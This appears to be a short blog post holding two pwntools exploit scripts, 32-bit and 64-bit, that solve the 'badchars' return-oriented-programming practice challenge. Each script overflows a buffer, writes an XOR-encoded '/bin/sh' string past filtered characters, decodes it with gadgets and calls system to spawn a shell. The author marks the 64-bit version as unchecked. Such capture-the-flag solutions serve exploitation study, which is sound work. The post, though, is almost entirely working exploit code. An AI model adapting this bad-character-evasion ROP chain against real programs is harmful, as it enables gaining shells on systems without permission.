32
# -*- coding:UTF-8 -*-
from pwn import*
p= process("./badchars32")
bin_sh = "/bin/sh\x00"
system_plt = 0x80484e0
#bss_addr = 0x804A040
date_addr = 0x804A038
#加密
xornum = ""
for i in bin_sh:
xornum += chr(ord(i)^2)
pop_esi_edi_addr = 0x8048899
mov_edi_esi_addr = 0x8048893
pop_ebx_ecx_addr = 0x8048896
xor_ebx_cl_addr = 0x8048890
#一般都分两次传入 32位
payload = 'A'*0x2c
payload += p32(pop_esi_edi_addr)
payload += xornum[0:4]
payload +=p32(date_addr)
payload += p32(mov_edi_esi_addr)
payload += p32(pop_esi_edi_addr)
payload += xornum[4:8]
payload += p32(date_addr+4)
payload += p32(mov_edi_esi_addr)
#解密
for x in range(0,len(xornum)):
payload += p32(pop_ebx_ecx_addr)
payload += p32(date_addr + x) + p32(2)
payload += p32(xor_ebx_cl_addr)
payload += p32(system_plt)
payload += p32(0)
payload += p32(date_addr)
p.recvuntil('>')
p.sendline(payload)
p.interactive()
64(待检验)
# -*- coding:UTF-8 -*-
from pwn import*
#context.log_level = 'debug'
p = process("./badchars")
bss_addr = 0x601080
pop_r12_r13_addr = 0x400b3b
mov_r13_r12_addr = 0x400b34
pop_r14_r15_addr = 0x400b40
xor_r15_r14_addr = 0x400b30
pop_rdi_addr = 0x400b39
system_plt_addr = 0x4006f0
bin_sh = "/bin/sh\x00"
xornum = ""
for i in bin_sh:
xornum += chr(ord(i) ^ 1)
payload = 'A'*0x28 +p64(0)
payload += p64(pop_r12_r13_addr)
payload += xornum
payload += p64(bss_addr)
payload += p64(mov_r13_r12_addr)
for x in range(0,len(xornum)):
payload += p64(pop_r14_r15_addr)
payload += p64(1)
payload += p64(bss_addr + x)
payload += p64(xor_r15_r14_addr)
payload += p64(pop_rdi_addr)
payload += p64(bss_addr)
payload += p64(system_plt_addr)
p.sendline(payload)
p.interactive()
网友评论